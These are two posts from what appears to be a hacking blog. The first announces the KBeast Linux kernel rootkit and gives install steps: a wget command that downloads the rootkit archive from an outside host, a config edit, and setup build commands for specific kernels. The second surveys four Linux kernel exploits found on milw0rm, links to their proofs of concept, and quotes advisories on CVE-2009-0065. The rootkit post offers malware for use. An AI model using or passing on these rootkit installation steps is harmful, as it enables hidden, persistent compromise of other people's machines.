KBeast (Kernel Beast) is new kernel rootkit based on the publicly known rootkit, modification is made in order to support kernel 2.6.16, 2.6.18, 2.6.32, and 2.6.35. Actually it should work for kernel 2.6.9 up to 2.6.35 or more, but our installer script is only created for 2.6.16, 2.6.18, 2.6.32, and 2.6.35. Below are quick step installing the beast:

• wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
• tar zxvf ipsecs-kbeast-v1.tar.gz
• cd kbeast-v1/
• modify config.h to meet your requirement, remember that _MAGIC_NAME_ must be user with sh/bash shell
• In order to install in kernel 2.6.16 or 2.6.18, execute ./setup build 0
• In order to install in kernel 2.6.32 or 2.6.35, execute ./setup build (actually it should work for the recent kernel)
• In order to install in kernel 2.6.9, edit .cc1 file to remove all sys_unlinkat() related code, modify syscall table address manually, then execute ./setup build 0

Be kind to note that the beast has been tested in, but not limited to, kernel 2.6.9, 2.6.16, 2.6.18, 2.6.32, 2.6.35 (i386 or x86_64). The feature of this rootkit are:

Read more »

I just look arround on milw0rm today and searching for linux kernel exploit, luckily i find four new linux kernel exploits.

• First exploit is to attack linux kernel locally using exit_notify() function vulnerability. This flaw affects linux kernel less than 2.6.29 (most of linux kernel). Just take a look here for the proof of concept.

• Second exploit is to attack linux kernel locally using UDEV vulnerability. Udev less than 1.4.1 is reported that it doesn’t verify wheter a NETLINK message originates from kernel space, which allows local users to gain root priviledge by sending a NETLINK message from user space. Let take a look here and here for the proof of concept.

• Third exploit is to attack linux kernel remotely using SCTP FWD memory corruption. Some people say this bug isn’t exploitable untill sgrakkyu gives his explanation. Sgrakkyu explanation can be read here, take a look here for the proof of concept. This flaw affects most of linux kernel.

• Fourth exploit is to attack linux kernel locally using ptrace_attach() function vulnerability. This flaw affects linux kernel version 2.6.29. Just take a look here and here for the proof of concept.

Now i just think, which is more secure by default “linux or windows??“, even openbsd which’s claimed as the most secured operating system has a stupid bugs inside its code.

Common Vulnerabilities and Exposures

http://cve.mitre.org/cgi-bi/cvename.cgi?name=CVE-2009-0065

“Buffer overflow in net/sctp/sm_statefuns.c in the Stream Control Transmission Protocol (sctp) implementation in the Linux kernel before 2.6.28-git8 allows remote attackers to have an unknown impact via an FWD-TSN (aka FORWARD-TSN) chunk with a large stream ID. “

Ubuntu Security Notice USN-751-1

http://www.ubuntu.com/usn/usn-751-1

“The SCTP stack did not correctly validate FORWARD-TSN packets. A remote attacker could send specially crafted SCTP traffic causing a system crash, leading to a denial of service. (CVE-2009-0065)”

RedHat Security Advisory

http://rhn.redhat.com/errata/RHSA-2009-0331.html

“a buffer overflow was found in the Linux kernel Partial Reliable Stream Control Transmission Protocol (PR-SCTP) implementation. This could, potentially, lead to a denial of service if a Forward-TSN chunk is received with a large stream ID. (CVE-2009-0065, Important) ”

Read more »